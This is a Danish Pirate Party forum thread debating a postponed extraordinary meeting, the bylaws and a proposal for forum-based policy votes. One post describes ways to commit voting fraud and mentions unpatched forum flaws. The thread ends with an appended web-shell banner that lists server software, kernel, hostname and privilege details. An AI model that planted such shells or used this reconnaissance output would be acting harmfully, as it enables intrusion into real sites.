You are here

Udsat: Indkaldelse til landsmøde

32 posts / 0 new
Last post
Emil Kirkegaard
Emil Kirkegaard's picture
Udsat: Indkaldelse til landsmøde

Som vores kære piratkaptajn skrev:

Da søndag den 23. juni er Sct. Hans aften, er det et dårligt tidspunkt at holde landsmøde på. Samtidig har der været problemer med formalia i forbindelse med indkaldelsen.

Derfor har vi besluttet os for at udskyde det ekstraordinære landsmøde til et senere tidspunkt. Vi forventer at holde landsmødet en lørdag eftermiddag, som vi plejer, og hvor de fleste medlemmer også kan deltage. Der vil snarligst komme en mere præcis dato.

 

Hej Pirater,

Bestyrelsen indkalder hermed til ekstraordinært landsmøde den 23. Juni 2013 kl 19.00, som er ca. 17 dage fra nu. Mødet foregår som altid på IRC: https://chat.mibbit.com/#piratpartiet.dk@irc.piratpartiet.se På dagsordnen er kun et punkt, nemlig forslaget til at vedtage politik på hjemmesiden frem for kun på landsmødet. Forslaget kan læses nedenfor her, men tråden om forslaget er her: https://www.piratpartiet.dk/hvordan_skal_vi_vedtage_ny_politik

Hvordan skal vi vedtage ny politik?

Baggrund for forslaget

Hvordan skal vi vedtage ny politik i partiet? Det går alt for langsomt at skulle gøre det på et landsmøde en gang om året. Omend man kunne bruge vedtægernes mulighed for at indkalde til ekstraordinært landsmøde for at stemme om specifikke forslag. I så fald skulle man indkalde til landsmøder temmelig ofte. Det kunne man godt, men af de grunde som nævnes nedenfor, så er det ikke en god løsning.

Landsmødemetoden giver ikke meget mening når der er tale om et IT-parti. Landsmøder er møder som holdes i realtid, hvilket betyder at de kommer til at blive meget lange, samt at de er en slags skriftlig flersamtale hvor der lægges vægt på folks evner til at kunne forsvare et synspunkt ved at komme med et godt svar lige med det samme. På samme måde som debatter på TV. Med en sådan kommunikation kan man ikke træffe særlig fornuftige beslutninger. At træffe fornuftige beslutninger kræver betænkningstid og tid til at læse op om emnet. Et forum virker derfor som det bedste diskussionsmedie at diskutere politik via hvis man gerne vil have at det sker på så fornuftigt grundlag som muligt. Det er vi vel interesseret i givet mange medlemmers interesse for evidensbaseret politik (evidence-based policy).

Afstemninger på forum
Idéen er at ny politik vedtages på forummet. Men det skal gøres på en struktureret måde, for ellers resulterer det i diverse problemer.

Der er diverse parametre ved et sådant system. Disse er:

 • Afstemningstid
 • Flertalskravet
 • Repræsentativitetskravet
 • Maks. antal samtidige afstemninger

Nedenfor ses en kort beskrivelse af tankerne bag de forskellige parametre. Alle er kopieret fra vores crowdsourcing afstemninger.

Afstemningstid

For at kunne få noget vedtaget på landsmødet, så er der ingen krav til hvor lang tid betænkning folk skal have til mødet. Men vedtægterne skriver, at medlemmerne skal informeres om et landsmøde inkl. dagsorden minimum 14 dage før. I mit forslag til hvordan vi skal vedtage politik i fremtiden, så har jeg fastsat at alle afstemninger skal være åbne i en vis periode. Ideen er at undgå at folk som lige har lidt travlt i en uge ikke kan nå at deltage i en afstemning. Det ville give en urepræsentativ afstemning. Hvis man vil have folk til at træffe velovervejede beslutninger, så skal de også have betænkningstid. Prisen er at det tager længere tid at vedtage noget. Det er en balancegang.

Flertalskravet

For at kunne få noget vedtaget på landsmødet, så kræver det kun et normalt flertal på >50%. Men i mit forslag til hvordan vi skal vedtage politik i fremtiden, så har jeg åbnet mulighed for at kræve et større flertal. Ideen er at undgå interne store uenigheder. Prisen er at det kan blive svært at vedtage noget. Det er en balancegang.

Repræsentativitetskravet

For at kunne få noget vedtaget på landsmødet, så er der ingen krav til hvor mange afgivne stemmer der skal være. Men i mit forslag til hvordan vi skal vedtage politik i fremtiden, så har jeg åbnet mulighed for at kræve et minimumsantal. Ideen er at undgå meget urepræsentative afstemninger hvor en lille gruppe personer vedtager alt muligt. Prisen er at det kan blive svært at vedtage noget. Det er en balancegang.

Maks. antal samtidige afstemninger

Der er ingen begrænsning på hvor mange forslag som kan tages op og stemmes om på et enkelt landsmøde. Men i mit forslag til hvordan vi skal vedtage politik i fremtiden, så har jeg åbnet mulighed for at have et maksimalt antal samtidige afstemninger. Ideen er at undgå at der er så mange afstemninger i gang på en gang, at man ikke har tid til at sætte sig ind i emnet bare en smule. Det er især relevant for de mange mennesker som har fuldtidsarbejde. På den anden side, så nedsætter det hastigheden hvormed man kan vedtage ny politik i partiet. En balancegang.

Crowdsourcing af værdier

Alle ovenstående parametre har i længere tid været åbne til afstemning. Værdierne som folk er mest enige om er:

 • Afstemningstid = 4 uger
 • Flertalskravet = 2/3
 • Repræsentativitetskravet = 10% af medlemmerne (dvs. lidt over 20)
 • Maks. antal samtidige afstemninger = 5

Notifikation på mail og sociale medier

Partiet skal informere om alle forslag som er til afstemning både på sociale medier og per mail til alle medlemmer. Dette skal ske to gange. Én gang når afstemningen sættes i gang og en gang mere når halvdelen af afstemningstiden er forløbet. Begrundelsen er at minde folk om det som måske havde glemt det.

Hvem styrer systemet?

Det er usmart hvis alle og enhver kan starte en. Så bliver der heller ikke holdt styr på, om maks. er overholdt. Jeg foreslår, at afstemninger kun kan startes af bestyrelsen. Dog kan landsmødet tvinge bestyrelsen til at sætte et punkt til afstemning.

Stemmemuligheder

I stedet for et simpelt binært system, så har jeg valgt dette system:

 • FOR - min stemme er FOR forslaget, og min stemme tæller med til at opfylde kravet om repræsentativitet.
 • IMOD - min stemme er IMOD forslaget, og min stemme tæller med til at opfylde kravet om repræsentativitet.
 • Neutral - min stemme er blank, og min stemme tæller med til at opfylde kravet om repræsentativitet.
 • SUPERNEUTRAL - Min stemme er blank, og min stemmer tæller IKKE med til at opfylde kravet om repræsentativitet.

Ideen med FOR og IMOD er simpel. Ideen med NEUTRAL er at man støtter dem som forsøger at vedtage noget, men ikke selv mener sig i stand til at stemme det ene eller det andet. SUPERNEUTRAL viser at man ikke støtter dem som forsøger at vedtaget noget. Det giver samme resultat som at helt udeblive for afstemningen, men her kan man vise det.

Hvor mange procent som stemte FOR et forslag er lig FOR divideret med FOR+IMOD. Hvor mange som deltog i afstemningen er lig FOR+IMOD+NEUTRAL.

Så længe afstemningen kører, så kan man til enhver tid flytte sin stemme.

Hvordan stemmer man?

For at kunne stemme, så skal man bruge en bruger på hjemmesiden. Benytter man den samme email til sin bruger som den man er registreret med i medlemsdatabasen, så er det nemt at verificere at man er medlem. Ole Husgaard har gennemgået medlemsdatabasen og brugerdatabasen, og i de tilfælde hvor der var overensstemmelse mellem to emails, så er brugeren blevet godkendt som medlem. Er ens bruger ikke verificeret, så skal man kontakte bestyrelsen eller Ole Husgaard direkte. Man kan have lige så mange brugere man vil, men enhvert medlem kan kun have en bruger som kan stemme.

Har man ikke lyst til at have en bruger på forummet, så kan man bare undlade at bruge den.

Når ens bruger er registreret som partimedlem, så er det muligt at benytte afstemningsfunktionerne her.

Åbne afstemninger

Af sikkerhedsmæssige årsager, så er afstemningerne åbne efter model (2) diskuteret her. Det betyder at alle til enhver tid kan se hvad alle andre brugere har stemt. Det er deres kontrol for at kun partimedlemmer stemmer. Det kan også bruges til at rette fejl, i det at Drupal's optællingssystem tidligere har givet en fejloptælling. Derfor vil alle optællinger ske manuelt.

Ønsker man at være anonym, så skal man derfor undlade at fortælle hvilken bruger på forummet der er ens. Man kan også oprette flere brugere, fx en til at diskutere, og en til at stemme med.

Gyldighed

Kun partiets medlemmer kan stemme i afstemninger. Vi har nu et teknisk system på plads som gør at kun brugere som er registreret som medlemmer af partiet kan stemme i afstemningerne. Der gælder samme regel som ved landsmødet, nemlig at medlemmer kun har stemmeret hvis de har været medlemmer i mindst 30 dage.

Når en afstemning er afsluttet, så kontrollerer bestyrelsen at reglerne for afstemning er overholdt. Er de det, så er det hermed partiets officielle politik på området. Afstemningerne er åbne i den forstand at alle kan se hvilke brugere som stemmer hvad.

Giver en ny afstemning om samme emne et andet resultatet, så gælder den nyeste afstemning.

Ole Husgaard
Landsmødet er ikke lovligt indkaldt.

Vedtægternes §4 kræver, at bestyrelsen indkalder til landsmødet. Det kræves altså, at bestyrelsen har besluttet, at der skal indkaldes til landsmøde. Det er også sådan vi plejer: Beslutning om vores sidste landsmøde besluttede vi i bestyrelsen på et bestyrelsesmøde 9/2-2013.
 
Det er ikke for sjov vi har sådan en regel. Jeg tror de fleste kan se hvordan nogle i partiledelsen ellers kunne "kuppe" andre.
 
På vores sidste bestyrelsesmøde 28/5-2013 var det et punkt på dagsordenen. Desværre var mødet kl. 21:00 (IMHO for sent for et langt møde, når det er arbejdsdag næste dag), og landsmødet var sidste punkt på dagsordenen. Da vi nåede til sidste punkt om landsmødet var alle trætte, og det var over midnat. Nogle bestyrelsesmedlemmer havde allerede forladt mødet. Formanden (som havde bedt om dette punkt på dagsordenen) bad om, at vi skulle diskutere det senere med kommentaren "mener der er en del kød på det her emne så det kan godt tåle at blive diskuteret igenenm".  Vores kasserer og et andet bestyrelsesmedlem var enige, ligesom jeg var.
 
Sidst på eftermiddagen 5/6-2013 sendte Emil Kirkegaard en mail til bestyrelsesmedlemmerne om et møde samme aften. Det er ikke et lovligt indkaldt bestyrelsesmøde (§7 i vedtægterne siger "formanden indkalder dertil med 14 dages varsel").  Derfor er en beslutning på dette møde ikke en lovlig bestyrelsesbeslutning, En beslutning om landsmøde på dette møde er derfor ikke en lovlig beslutning ifølge vedtægterne. og den praksis vi har i partiet.
 

Ole Husgaard
Et lovligt landsmøde.

Jeg vil opfordre vores formand til at indkalde til et bestyrelsesmøde, efter reglerne i vores vedtægter. Her kan vi drøfte det emne, som der ifølge formanden er en del kød på. Og så kan vi beslutte at indkalde et landsmøde. Det vil ikke være imod vedtægterne, hvis vi gør det på den måde.

Laeborg
Enig med Ole i at formalia

Enig med Ole i at formalia altså skal overholdes, så hvis landsmødet ikke er lovligt indkaldt, må bestyrelsen hurtigst muligt få stablet et lovligt indkaldt landsmøde på benene.

Go-Gyo
Jeg er en af

Jeg er en af bestyrelsesmedlemmerne som har sagt god for at indkalde til et ekstraordinært landsmøde. Jeg tror det var 4/6 i bestyrelsen inkl. formanden som også synes det var en god idé. Hvis man læser vedtægterne (de kan i øvrigt findes her: https://www.piratpartiet.dk/vedt%C3%A6gter) så er det tydeligt at se at der ikke står på noget punkt at indkaldelse til landsmødet skal foregå på et bestyrelsesmøde.
 
Det som der står i vedtægernes paragraf 6 er: 
"Der kan afholdes ekstraordinære landsmøder, hvis der viser sig et behov herfor.
Bestyrelsen kan beslutte at indkalde til ekstraordinært landsmøde."
 
I paragraf 7 står også:
"Bestyrelsen er beslutningsdygtig, når minimum 2/3 af bestyrelsen er til stede, og bestyrelsens beslutninger træffes ved almindelig stemmeflerhed. Er der stemmelighed, er formandens stemme udslaggivende."
 
Der står intet i vedtægterne om at beslutningen skal ske på et bestyrelsesmøde og formalia er derfor, i mine øjne, blevet overholdt.
Det møde som Ole snakker om d. 5/6 var ikke et bestyrelsesmøde, men et impromptu møde for alle som ville være med til at diskutere last minute ændringer i den nye møde at vedtage politik på, som Emil har været ved at sammensætte.
 
Det ville være komplet stupidt at indkalde til et bestyrelsesmøde (som først kunne være om minimum 14 dage jvf. vedtægternes paragraf 7) for at beslutte noget som et flertal i bestyrelsen allerede har besluttet og i følge vedtægterne er lovligt berettiget til at beslutte.
 
Det er et spild af tid og det er personligt demotiverende for mit arbejde med partiet.

Ole Husgaard
Problemet er, at bestyrelsen

Problemet er, at bestyrelsen ikke har besluttet at afholde et ekstraordinært landsmøde. Bestyrelsen er kun beslutningsdygtig på et lovligt indkaldt bestyrelsesmøde.
 
Det er almindelig foreningsret.

Strawb
Det lyder som en tolkning af

Det lyder som en tolkning af paragraf 7. Jeg ser det ihvertfald ikke eksplicit i paragraffen, at den slags beslutninger kun kan foregå på et almindeligt bestyrelsesmøde.
Det virker som formalia for formalia's skyld i mine øjne. Hvis 4/6 bestyrelsesmedlemmer synes det er i orden at indkalde til ekstraordinært landsmøde, hvorfor skal de så holdes tilbage af noget der ikke engang er fastsat på skrift?

Geestkraker
Geestkraker's picture
Adgang for ikke-medlemmer?

Kan man deltage selvom man slet ikke er medlem af Piratpartiet?

Go-Gyo
Ja man må gerne deltage

Ja man må gerne deltage selvom man ikke er medlem men du har selvfølgelig ikke stemmeret :)
 

Emil Kirkegaard
Emil Kirkegaard's picture
Der står ikke noget i

Der står ikke noget i vedtægterne om at man skal træffe beslutningen på et bestyrelsesmøde. Det er en tolkning OH har opfundet.

Emil Kirkegaard
Emil Kirkegaard's picture
Udover det Thomas nævnte

Udover det Thomas nævnte ovenfor, så foregår det her:

Du er altid velkommen til at benytte dig af vores forum, eller at fange os til en chat: https://chat.mibbit.com/#piratpartiet.dk@irc.piratpartiet.se eller, hvis du bruger en anden IRC klient: irc://#Piratpartiet.dk@irc.piratpartiet.se

Alle bestyrelsesmøder har mig bekendt været åbne indtil videre. Men det er vist ikke noget formelt krav (?).

Emil Kirkegaard
Emil Kirkegaard's picture
Det er et spild af tid og det

Det er et spild af tid og det er personligt demotiverende for mit arbejde med partiet.

Jeg vil gentage dette da det er særligt vigtigt at forstå.

Hinton
Når paragraf 6 og 7 benytter

Når paragraf 6 og 7 benytter benævnelsen bestyrelsen, omhandler det bestyrelsens ageren på et bestyrelses møde.
 
Hvis 4 medlemmer af Piratpartiets bestyrelse tilfældigt mødes på gaden kan de således ikke træffe gyldige beslutninger på vegne af bestyrelsen alene i kraft af at udgøre 4/6 dels flertal, det er en konsekvens af at der stilles krav til hvorledes et bestyrelsesmøde indkaldes og er beslutningsdygtigt (jf. paragraf 7, stk 2 og 3).
 
Med mindre der foreligger et referat fra et lovligt indkaldt bestyrelses møde hvori det er besluttet at indkalde til et ekstraordinært landsmøde kan jeg således ikke se at det ekstraordinære landsmøde er lovligt indkaldt.
 
 
Jeg er også fuldstændigt enig med Emil at denne slags diskussion om hvad der er formalia, hvornår formalia skal overholdes og hvad der i sidste ende kan ende i petitesser både kan og vil virke demotiverende for de aktive i partiet, og potentielt set kan skade vores muligheder for at blive taget seriøst, samt påvirke vores mulighed for at tiltrække nye medlemmer. Og her går jeg ud fra at vi blot taler om denne tråd på forumet.
 
Hvordan kommer det så ikke til at fremstå hvis det ekstraordinære landsmøde, der burde handle om et rigtigt godt forslag der styrker Piratpartiets demokrati, potentielt bliver en fortsættelse af debatten om hvorvidt mødet er lovligt indkaldt, beslutningsdygtigt, og personfnider iøvrigt?
 
 
Jeg håber at mødet bliver afviklet i en behagelig og konstruktiv atmosfære. Men som udenforstående kan jeg ikke andet end undre mig over at samtlige bestyrelses medlemmer på nuværende tidspunkt, set i lyset af alle de meget personlige debatter der har foregået på forumet, ikke har forstået, eller værre, har ignoreret, vigtigheden af at kommunikere med hinanden.

AmandaRuth
hvor holdes mødet

Det kan være det er mig som er blind. Men hvor holdes mødet? Og holdes det overhoved. 

Go-Gyo
Jesus christ. Kan vi ikke

Jesus christ. Kan vi ikke bare blive enige om at det er en god idé at få afholdt et landsmøde, så vi kan begynde at udvide vores politik?

Hinton. Bestyrelsesarbejde er ikke noget jeg har så meget erfaring med og jeg kan nok bedst beskrive mig selv som en velmenende amatør på det punkt. Det jeg brænder for er at føre piratpartiet videre i teksten og ikke diskutere foreningsret og skændes om vores vedtægter som på flere punkter er lidt for åbne for fortolkning. Jeg kan godt høre at der er noget uenighed om det kommende landsmøde er "lovligt" eller "ulovligt" indkaldt, men jeg håber at det er et punkt som kan ignoreres denne gang i forhold til vigtigheden af at udbrede piratpartiets politik så vi kan udtale os på nogle flere punkter og fremstå som et (forhåbentlig) mere seriøst parti. Og jeg håber du kommer til mødet selvfølgelig :)
 
AmandaRuth. Det er ikke dig som er blind :) alle vores landsmøder holdes over nettet på denne side: 
 https://chat.mibbit.com/#piratpartiet.dk@irc.piratpartiet.se
Det er en oplysning som egentlig burde stå i det oprindelige indlæg, så jeg går ud fra at Emil opdaterer det, når han ser det her.
Du kan finde web-adressen igen under "Kontakt" hvis du skulle have brug for det.
 
Til landsmøder er det iøvrigt en god idé at være på IRC en lille halv time før vi går igang så vi kan begynde at verificere at folk er medlemmer og har været det de sidste 30 dage. 

Emil Kirkegaard
Emil Kirkegaard's picture
Jeg vil lige pointere at det

Jeg vil lige pointere at det kun er et medlem af bestyrelsen som skaber problemer. De andre er alle gode venner og snakker dagligt sammen. Det sidste medlem er generelt isoleret fra resten af bestyrelsen, og var det også i bestyrelsen før den, hvor samme problemstilling fandt sted. Det er en situation som er skadeligt for bestyrelsesarbejdet, men det sidste medlem agter ikke at trække sig, og siden at personen har en betydelig mængde støtter bag sig, så kommer personen nok i bestyrelsen efter næste valg igen, hvorefter at jeg forventer at problemstillingen fortsætter. Demokratiet tvinger i dette tilfælde en problematisk bestyrelsessammensætning.

Emil Kirkegaard
Emil Kirkegaard's picture
Det er en fejl at der ikke

Det er en fejl at der ikke stod i indkaldelsen 'hvor' præcis det bliver holdt. Nye medlemmer kan ikke forventes at vide den slags, selvom det altid bliver holdt samme 'sted'. :)

Tidspunktet står dog i indkaldelsen (kl. 1900). Men et medlem har udtrykt frustration over at det ligger oveni Sankt Hans. Derfor er planen at vi flytter det til lidt tidligere på dagen, fx kl. 1300.

Luffelise
Jeg er fuldstændig enig med

Jeg er fuldstændig enig med Ole Hursgaard i at et ekstra ordinært landsmøde skal indkaldes efter de regler som nu engang er blevet vedtaget i piratpartiet.
Ligeledes synest jeg at det at indkalde til møde på en dag som skt. hans, viser at man ikke har tænk på at folk har børn, mm. således at dato`en alene kan volde problemer for flere mennesker. 
Et er at indkalde til ekstra ordinært landsmøde, men lad dette ske efter reglerne.

Emil Kirkegaard
Emil Kirkegaard's picture
Ingen påstår vel at det ikke

Ingen påstår vel at det ikke skal ske efter reglerne. Det er reglernes fortolkning der er uenighed om.

FXÆTG NG FR NG BU UNE GELYYRG RAQAH RA CREFBA BC NS ÆEZRG

egnat
Tidligere tidspunkt: Ja tak

Emil Kirkegaard wrote:
Tidspunktet står dog i indkaldelsen (kl. 1900). Men et medlem har udtrykt frustration over at det ligger oveni Sankt Hans. Derfor er planen at vi flytter det til lidt tidligere på dagen, fx kl. 1300.

Jeg vil gerne bakke op om flytningen af tidspunktet til kl 13. Jeg vil opfordre til, at man i bestyrelsen lægger sig fast på tidspunktet, og får opdateret indkaldelsen så hurtigt som muligt af hensyn til medlemmernes planlægning.
 

Ole Husgaard
Om selve forslaget

Jeg synes et forslag om at vedtage ny politik mellem landsmøderne ved åbne afstemninger blandt medlemmerne er rigtigt godt.
 
Men indfører vi det, skal vi naturligvis sikre, at svindel med afstemningerne ikke er muligt. Og her kan vi gøre det meget bedre, for svindel med afstemningerne er ret let med forslaget, som det her er fremsat.
 
I forslagets afsnit "Hvordan stemmer man?" virker det som om Emil endnu ikke har forstået sammenhængen mellem medlemsregisteret og brugerdatabasen her i forummet, da han skriver om mailadresser, som ikke har noget med denne sammenhæng at gøre. Jeg vil derfor lige forklare denne sammenhæng her:
I medlemsregisteret har vi for hvert medlem et felt, som angiver medlemmets brugernavn her i forummet. Her i forummet har vi en rolle "partimedlem", som tildeles de forum-brugere, som er medlemmer i Piratpartiet. Rollen "partimedlem" kræves for at man kan afgive sin stemme i en afstemning her i forummet. Jeg har så lavet et lille stykke software der sammenkører de to registre. Det gennemgår alle brugere her i forummet, og for hver forumbruger checkkes, om et medlem i medlemsregisteret har det pågældende brugernavn. Hvis ja, gives brugeren rollen "partimedlem", ellers fratages brugeren denne rolle.
 
Men en allerede afgivet stemme her i forummet fjernes ikke igen, hvis den bruger der stemte får fjernet rollen "partimedlem", og det åbner op for svindel, så medlemmer kan stemme flere gange i samme afstemning: Et medlem kan først afgive sin stemme under et brugernavn, dernæst oprette en ny bruger her i forummet og bede om at få rettet feltet med forumbrugeren i medlemsregisteret. Når den nye forumbruger så har fået rollen "partimedlem", kan medlemmet stemme endnu en gang i samme afstemning. Når vi går over til PirateWeb kan medlemmerne selv rette feltet med forumbrugeren i medlemsregisteret, og på denne måde kan et enkelt partimedlem stemme rigtigt mange gange i samme afstemning, uden at det kan opdages.
 
Derfor er det vigtigt, at vi ikke alene har åbne afstemninger, men også viser i forummet hvilke brugere der er partimedlemmer.
 
Vi bør også have klare regler for folk med administrativ adgang til forummet. Disse folk kan manuelt tildele forumbrugere rollen "partimedlem", hvilket igen åbner op for svindel med afstemningerne. Jeg har allerede set administratorer her i forummet manuelt tildele rollen til forumbrugere der ikke er partimedlemmer (dog kun for personer, som har bedt om at blive medlemmer). Vi bør derfor have en helt klar regel om, at ingen med administrator adgang manuelt retter rollen "partimedlem", og at denne rolle alene må rettes ved en automatiseret sammenkøring med medlemsregisteret. Opdages det, at dette misbruges af en administrator, fratages denne straks alle administrative rettigheder i forummet.
 
Vi bør også stramme op i sikkerheden på forummet, så folk ikke hacker forum-softwaren for at svindle med afstemningerne. Siden Oliver og Emil i januar overtog ansvaret for driften af forummet, er der ikke lavet en eneste sikkerhedsopdatering, selvom der er fundet en række alvorlige sikkerhedsfejl i den software vi bruger til forummet. De fleste af disse sikkerhedsfejl er i dag offentligt kendte, og folk kan udnytte dem til at hacke forummet for at svindle med afstemningerne. Den person, som tidligere tog sig af sikkerhedsopdateringerne, har bedt om at blive frataget alle driftsmæssige opgaver, da han ikke kunne med Emil. For at undgå svindel med afstemningerne ved hacking, bør vi derfor kræve, at alle sikkerhedsopdateringer bliver installeret, og at sikkerhedsopdateringer i fremtiden løbende bliver installeret.
 
Der er også et teknisk problem med, at man skal have været partimedlem i 30 dage for at kunne stemme. Det har vi simpelthen ikke mulighed for rent teknisk at sikre. Da det ikke giver mening at vedtage elektroniske afstemninger i en form vi ikke teknisk kan implementere, bliver vi nødt til enten at ændre forslaget på dette punkt, eller at vente til nogen får tid til at omskrive det stykke software, som sammenkører medlemsregisteret og brugerdatabasen i forummet. Jeg vil foreslå, at vi i første omgang lader alle medlemmer have stemmeret (uanset hvor længe de har været medlemmer), og giver bestyrelsen mandat til senere at ændre det til at man skal have været partimedlem i 30 dage for at kunne stemme, når de tekniske muligheder er på plads.
 
Desuden ser jeg gerne, at vi - i hvert fald i starten - har en nødbremse, så vi ikke risikerer, at helt vanvittig politik bliver vedtaget som partiets officielle politik. En sådan nødbremse kunne være, at bestyrelsen får mulighed for at beslutte, at en konkret afstemning alligevel ikke er partiets officielle politik. En sådan bestyrelsesbeslutning skal så naturligvis op som et punkt på dagsordenen ved næste landsmøde.
 
Endeligt ser jeg gerne en mere præcis og kortfattet tekst vi kan stemme om på landsmødet end ovenstående forslag, så det er helt klart om landsmødets krav til de elektroniske afstemninger overholdes.

Sølvpapirshat
Jeg har igennem længere tid

Jeg har igennem længere tid overvejet at blive medlem af Piratpartiet. Dog ser jeg nogle højest obskure tendenser i jeres praksis, som gør, at jeg for alvor tøver med at tage dette skridt. Jeg har læst partiets vedtægter, og ved derfor, at denne indkaldelse til landsmøde ER I STRID MED VEDTÆGTERNE. Man kan ikke forvente at blive taget seriøst som parti, hvis ens praksis ikke er i overenstemmelse med det vedtagne. Derudover er det forstemmende at observere en foruroligende intrigant tone som visse medlemmer udviser overfor medlemmer, som påpeger, at praksis ikke er i overenstemmelse med det vedtagne :( Dén slags psykologiske mind games er utroligt ukammeratlige og manipulerende - ikke noget jeg ønsker at være en del af. 
Mvh. Janne - og med hilsen til de gode kræfter som der dog ser ud til at være i partiet.

Emil Kirkegaard
Emil Kirkegaard's picture
I strid med din tolkning af

I strid med din tolkning af vedtægterne. Husk det. Vedtægterne er ret uklare, og kræver derfor en del tolkning. Noget ingen har monopol på. Der er ingen retsindstans i partiet, så det er uklart hvad præcis praksis bør være når der er tale om uenighed om fortolkningen. I praksis betyder det nok bare at bestyrelsen følger sine egne (flertallets i bestyrelsen) fortolkninger. Landsmødet kan jo til enhver tid irettesætte bestyrelsen, og evt. vælge en anden bestyrelse.

neglesaks
@Sølvpapirshat:

@Sølvpapirshat:

"Jeg har igennem længere tid overvejet at blive medlem af Piratpartiet."

Hvad har afholdt dig fra at engagere dig? Partiet har været kontingentfrit i en længere periode, og du venter til der er intriger i en forumtråd til at vise tilstedeværelse?

"Dog ser jeg nogle højest obskure tendenser i jeres praksis, som gør, at jeg for alvor tøver med at tage dette skridt. Jeg har læst partiets vedtægter, og ved derfor, at denne indkaldelse til landsmøde ER I STRID MED VEDTÆGTERNE."

Spændende et en bruger vi ikke kender til og aldrig har hørt om før viser sådan en nidkær interesse for vedtægterne og disses tolkning. Det er hvad jeg vil kalde en obskur tendens...

"Man kan ikke forvente at blive taget seriøst som parti, hvis ens praksis ikke er i overenstemmelse med det vedtagne. "

Efterhånden burde det være klart at det er en uoverenstemmelse i tolkning (eller rettere OVERtolkning) af vedtægterne som er til grund for denne intriger, fremfor noget egentligt brud på vedtægterne.

Emil Kirkegaard
Emil Kirkegaard's picture
Jeg vil lige pointere at det

Jeg vil lige pointere at det var 5/6 af bestyrelsen, ikke 4/6 som tidligere nævnt. Vi var fire bestyrelsesmedlemmer samlet i en Skype-samtale, og Rolf var med på 'gehør' via Facebook. Alle 5 sagde god for det. Også dem som deltog i mødet på IRC sagde god for det. Derudover sagde adskillige andre aktive også god for det.

Warlem
Jeg må indrømme jeg ærlig

Jeg må indrømme jeg ærlig talt ikke kan se hvad problemet er eller hvilke formalia der bliver overtrådt. 
Der bliver besluttet i bestyrelsen at der skal indkaldes til et ekstraordinært landsmøde. 
§4 omhandler et ordinært landsmøde og §7 omhandler bestyrelsesmøder. 
 
I SAMTLIGE vedtægter i andre foreninger står der udførligt omkring tidsfrister for indkaldelse til ekstraordinær generalforsamling. 
Ole - Hvis du eller andre har lyst til at skrive vedtægterne så de kun kan forstås på én måde, skal du være velkommen til det. Indtil videre må vi sige at den demokratiske beslutningen omkring fortolkningerne er op til bestyrelsen som samlet. Jeg tror ikke der er nogen der vil sige at de vedtægter er særlig gode og jeg ved også at vi har arbejdet helt fra sidste år med at få dem lavet om.

Gina56
Godt det nu er blevet udsat.

Godt det nu er blevet udsat.
Det er under al kritik at prøve at indkalde til landsmøde på et tidspunkt hvor alle mennesker holder famillie sankt hans. Det virker useriøst og manipulerende at indkalde til et møde på en dag hvor hele danmark er optaget.
Det er klart, at indkaldelsen er i strid med vedtægterne, og for mig virker det som om nogen prøver på at køre hetz mod Ole Husgaard, som har gjort et kæmpe arbejde i de år der er gået.

Go-Gyo
Jeg vil gerne gøre dig

Jeg vil gerne gøre dig opmærksom på at i lang tid var Piratpartiet dødt og ville sikkert stadig være det hvis det ikke var for de folk som udgør bestyrelsen ligenu. I stedet for at skrive mavesure indlæg henvendt til den lille håndfuld mennesker i partiet som aktivt gør noget skulle du i stedet tage at engagere dig hvis du er utilfreds.

Ole Husgaard
Når bekymrede medlemmer

Når bekymrede medlemmer fremsætter kritik, er det lidt ærgerligt, at nogle i bestyrelsen vælger at svare med personangreb, i stedet for at forholde sig til kritikken.

Ole Husgaard
Det virker for mig som om

Det virker for mig som om nogle af dem der nu vil fortolke vore vedtægter anderledes end vi hidtil har gjort mangler forståelse for juraen bag. Da jeg har en del års erfaring med bestyrelsesarbejde vil jeg lige redegøre lidt for det.
 
Nøgleordet her er bestyrelsesansvar. Det betyder, at bestyrelsesmedlemmer kan blive holdt personligt ansvarlige for bestyrelsesbeslutninger der er i strid med gældende regler.
 
Derfor lærer man som bestyrelsesmedlem nogle grundregler. Det er for eksempel: Man krænker aldrig love eller vedtægterne. Er der den mindste tvivl om fortolkningen dækker man sig ind ved først at få en skriftlig udtalelse fra en kompetent jurist. Man fraviger ikke sædvane, medmindre der er en god grund til det, og generel enighed om det. Og man sørger for, at alt går helt efter bogen hvad angår generalforsamlinger (vi kalder det landsmøder, men juridisk er det det samme).
 
Jeg har talt med to andre personer, som har mere forstand på juraen her end jeg selv har, og de har givet mig enslydende svar: Det er tale om standardformuleringer i vores vedtægter, som der er en solid retspraksis omkring, og der er ingen tvivl om, at dette landsmøde ikke var lovligt indkaldt. Selv hvis indkaldelsen til landsmøde var besluttet på lovlig vis, havde indkaldelsen til landsmødet ikke været lovlig, da stedet for mødet ikke var angivet i indkaldelsen, og der ikke blev rettet op på dette ved at skrive til medlemmerne senest 14 dage før landsmødets indkaldelse.
 
Hvis man havde forsøgt at afholde det nu aflyste landsmøde, ville ethvert partimedlem kunne anlægge en retssag mod partiet med henblik på at få kendt landsmødet ugyldigt, og derved også enhver beslutning taget på det ugyldige landsmøde. Og her kommer reglerne om bestyrelsesansvar ind: Det er overvejende sandsynligt, at retten ville dømme, at alle retsudgifter - herunder sagsøgernes advokatsalærer - skulle betales personligt af de bestyrelsesmedlemmer, som var ansvarlige for det ulovligt indkaldte landsmøde.
 

Emil Kirkegaard
Emil Kirkegaard's picture
Brugere, ikke nødvendigvis

Brugere, ikke nødvendigvis medlemmer. En af dem endda identificeret som ikke-medlem. Alle som er enten totalt ukendte personer, eller kendte men inaktive personer. Dvs. kritkken primært kommer fra folk der ikke bidrager. Det irriterer naturligvis dem som bidrager, og dræner deres arbejdslyst. En sådan arbejdslyst er vital i politiske organisationer.

Emil Kirkegaard
Emil Kirkegaard's picture
Stedet er altid det samme, så

Stedet er altid det samme, så det er en vist en bagatel.

GNY.Shel! Encoded v1.1 edited B.Y $c0rPi0n
 _____ _  ___   __ _____ _     _ _ 
 / ____| \ | \ \  / // ____| |    | | |
| | __| \| |\ \_/ /| (___ | |__  ___| | |
| | |_ | . ` | \  / \___ \| '_ \ / _ \ | |
| |__| | |\ | | | _ ____) | | | | __/ | |
             \_____|_| \_| |_|(_)_____/|_| |_|\___|_|_| {V1.1 edited by $c0rPi0n}
Apache/2.2.15 (CentOS). PHP/5.3.3
Kernel: Linux pet.piratpartiet.dk 2.6.32-504.23.4.el6.x86_64 #1 SMP Tue Jun 9 20:57:37 UTC 2015
x86_64
Safe-Mode: OFF (not secure)
uid=48(apache) gid=48(apache) groups=48(apache) Disabled PHP Functions: NONE
cURL: ON
